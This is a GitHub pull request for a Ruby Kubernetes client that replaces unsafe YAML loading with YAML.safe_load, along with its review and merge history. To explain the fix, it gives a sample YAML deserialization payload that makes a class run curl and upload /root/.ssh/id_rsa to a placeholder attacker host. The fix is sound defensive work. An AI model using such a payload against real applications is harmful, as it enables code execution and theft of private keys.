Use YAML.safe_load for loading YAMLs #71

kke · 2018-12-14T08:16:18Z

Use YAML.safe_load and a custom YAML.safe_load_stream for loading YAML files

Without safe load, an app with classes that have "insecure" initializers may execute code from configuration YAMLs.

For example, something like this that was intended to just be called from somewhere in the code:

class UnsafeCommand
  def initialize(*cmd)
    @result = system(*cmd)
  end

  def success?
    !!@result
  end

Now your app is exploitable if it uses k8s-client by creating a YAML that looks something like:

---
foo: !ruby/object:UnsafeCommand
  cmd:
    - curl
    - -F
    - ‘data=@/root/.ssh/id_rsa’ 
    - hack.example.com/steal_ssh_key

Now loading that config will call UnsafeCommand.new('curl', '-F', " ‘data=@/root/.ssh/id_rsa’", 'hack.example.com/steal_ssh_key')

By using safe_load, this does not happen because UnsafeCommand is not explicitly whitelisted.

jnummelin

Needs some speccing and some docs for YAMLSafeLoadStream

kke · 2018-12-20T08:09:42Z

Specs and yardocs added

kke · 2018-12-20T11:58:32Z

Use YAML.safe_load for loading YAMLs

ca9c74b

kke added the enhancement New feature or request label Dec 14, 2018

jakolehm requested a review from jnummelin December 17, 2018 08:48

jnummelin suggested changes Dec 20, 2018

View reviewed changes

Yardoc and spec

3e38c25

Use yaml-safe_load_stream gem

d25f077

jnummelin approved these changes Dec 20, 2018

View reviewed changes

jnummelin merged commit abfbad1 into master Dec 29, 2018

jnummelin deleted the feature/yaml_safe_load branch December 29, 2018 06:51

jakolehm mentioned this pull request Jan 2, 2019

Release v0.7.0 #84

Merged

Provide feedback